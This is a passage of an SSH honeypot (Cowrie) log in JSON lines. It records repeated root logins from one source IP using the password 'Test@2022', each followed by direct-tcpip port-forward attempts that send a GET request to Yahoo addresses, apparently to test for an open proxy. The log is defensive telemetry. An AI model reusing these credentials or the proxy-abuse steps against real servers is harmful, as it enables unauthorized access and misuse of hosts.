-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:08:13.411005Z","src_ip":"213.209.150.239","session":"c52d5ba199b1"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:08:13.647138Z","src_ip":"213.209.150.239","session":"c52d5ba199b1"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"213.209.150.239","src_port":30280,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:30280","sensor":"my-vps","timestamp":"2025-08-26T01:08:13.696564Z","session":"c52d5ba199b1"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:08:13.743857Z","src_ip":"213.209.150.239","session":"c52d5ba199b1"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"213.209.150.239","src_port":13281,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:13281","sensor":"my-vps","timestamp":"2025-08-26T01:08:13.881532Z","session":"c52d5ba199b1"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:08:13.928813Z","src_ip":"213.209.150.239","session":"c52d5ba199b1"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:08:13.977017Z","src_ip":"213.209.150.239","session":"c52d5ba199b1"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":52117,"dst_ip":"1.2.3.4","dst_port":22,"session":"828bb55cffb5","protocol":"ssh","message":"New connection: 213.209.150.239:52117 (1.2.3.4:22) [session: 828bb55cffb5]","sensor":"my-vps","timestamp":"2025-08-26T01:08:14.023511Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:08:14.024476Z","src_ip":"213.209.150.239","session":"828bb55cffb5"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:08:14.071729Z","src_ip":"213.209.150.239","session":"828bb55cffb5"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:08:14.307914Z","src_ip":"213.209.150.239","session":"828bb55cffb5"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":32468,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:32468","sensor":"my-vps","timestamp":"2025-08-26T01:08:14.356248Z","session":"828bb55cffb5"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:08:14.403598Z","src_ip":"213.209.150.239","session":"828bb55cffb5"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":17152,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:17152","sensor":"my-vps","timestamp":"2025-08-26T01:08:14.541850Z","session":"828bb55cffb5"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:08:14.589455Z","src_ip":"213.209.150.239","session":"828bb55cffb5"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:08:14.638171Z","src_ip":"213.209.150.239","session":"828bb55cffb5"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":52176,"dst_ip":"1.2.3.4","dst_port":22,"session":"ab18aeea2926","protocol":"ssh","message":"New connection: 213.209.150.239:52176 (1.2.3.4:22) [session: ab18aeea2926]","sensor":"my-vps","timestamp":"2025-08-26T01:08:14.693478Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:08:14.694399Z","src_ip":"213.209.150.239","session":"ab18aeea2926"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:08:14.751351Z","src_ip":"213.209.150.239","session":"ab18aeea2926"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:08:15.034028Z","src_ip":"213.209.150.239","session":"ab18aeea2926"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":14256,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:14256","sensor":"my-vps","timestamp":"2025-08-26T01:08:15.091794Z","session":"ab18aeea2926"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:08:15.148626Z","src_ip":"213.209.150.239","session":"ab18aeea2926"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":16017,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:16017","sensor":"my-vps","timestamp":"2025-08-26T01:08:15.303153Z","session":"ab18aeea2926"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:08:15.360056Z","src_ip":"213.209.150.239","session":"ab18aeea2926"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:08:15.418515Z","src_ip":"213.209.150.239","session":"ab18aeea2926"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":52237,"dst_ip":"1.2.3.4","dst_port":22,"session":"2d1d6265cae4","protocol":"ssh","message":"New connection: 213.209.150.239:52237 (1.2.3.4:22) [session: 2d1d6265cae4]","sensor":"my-vps","timestamp":"2025-08-26T01:08:15.474103Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:08:15.475005Z","src_ip":"213.209.150.239","session":"2d1d6265cae4"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:08:15.531587Z","src_ip":"213.209.150.239","session":"2d1d6265cae4"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:08:15.814335Z","src_ip":"213.209.150.239","session":"2d1d6265cae4"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":22406,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:22406","sensor":"my-vps","timestamp":"2025-08-26T01:08:15.871955Z","session":"2d1d6265cae4"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:08:15.928765Z","src_ip":"213.209.150.239","session":"2d1d6265cae4"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"213.209.150.239","src_port":14274,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:14274","sensor":"my-vps","timestamp":"2025-08-26T01:08:16.083171Z","session":"2d1d6265cae4"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:08:16.139847Z","src_ip":"213.209.150.239","session":"2d1d6265cae4"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:08:16.197406Z","src_ip":"213.209.150.239","session":"2d1d6265cae4"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":52317,"dst_ip":"1.2.3.4","dst_port":22,"session":"adfc4dd93a3d","protocol":"ssh","message":"New connection: 213.209.150.239:52317 (1.2.3.4:22) [session: adfc4dd93a3d]","sensor":"my-vps","timestamp":"2025-08-26T01:08:16.253289Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:08:16.254326Z","src_ip":"213.209.150.239","session":"adfc4dd93a3d"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:08:16.311101Z","src_ip":"213.209.150.239","session":"adfc4dd93a3d"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:08:16.594114Z","src_ip":"213.209.150.239","session":"adfc4dd93a3d"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"213.209.150.239","src_port":18196,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:18196","sensor":"my-vps","timestamp":"2025-08-26T01:08:16.653253Z","session":"adfc4dd93a3d"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:08:16.710215Z","src_ip":"213.209.150.239","session":"adfc4dd93a3d"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"213.209.150.239","src_port":7251,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:7251","sensor":"my-vps","timestamp":"2025-08-26T01:08:16.867086Z","session":"adfc4dd93a3d"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:08:16.923723Z","src_ip":"213.209.150.239","session":"adfc4dd93a3d"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:08:16.981359Z","src_ip":"213.209.150.239","session":"adfc4dd93a3d"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":52372,"dst_ip":"1.2.3.4","dst_port":22,"session":"16d89018cfe4","protocol":"ssh","message":"New connection: 213.209.150.239:52372 (1.2.3.4:22) [session: 16d89018cfe4]","sensor":"my-vps","timestamp":"2025-08-26T01:08:17.027450Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:08:17.028595Z","src_ip":"213.209.150.239","session":"16d89018cfe4"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:08:17.076038Z","src_ip":"213.209.150.239","session":"16d89018cfe4"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:08:17.311128Z","src_ip":"213.209.150.239","session":"16d89018cfe4"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":6715,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:6715","sensor":"my-vps","timestamp":"2025-08-26T01:08:17.359187Z","session":"16d89018cfe4"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:08:17.406405Z","src_ip":"213.209.150.239","session":"16d89018cfe4"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":6218,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:6218","sensor":"my-vps","timestamp":"2025-08-26T01:08:17.541579Z","session":"16d89018cfe4"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:08:17.588705Z","src_ip":"213.209.150.239","session":"16d89018cfe4"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:08:17.636821Z","src_ip":"213.209.150.239","session":"16d89018cfe4"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":52438,"dst_ip":"1.2.3.4","dst_port":22,"session":"4f2dd7ea0fc9","protocol":"ssh","message":"New connection: 213.209.150.239:52438 (1.2.3.4:22) [session: 4f2dd7ea0fc9]","sensor":"my-vps","timestamp":"2025-08-26T01:08:17.683517Z"}
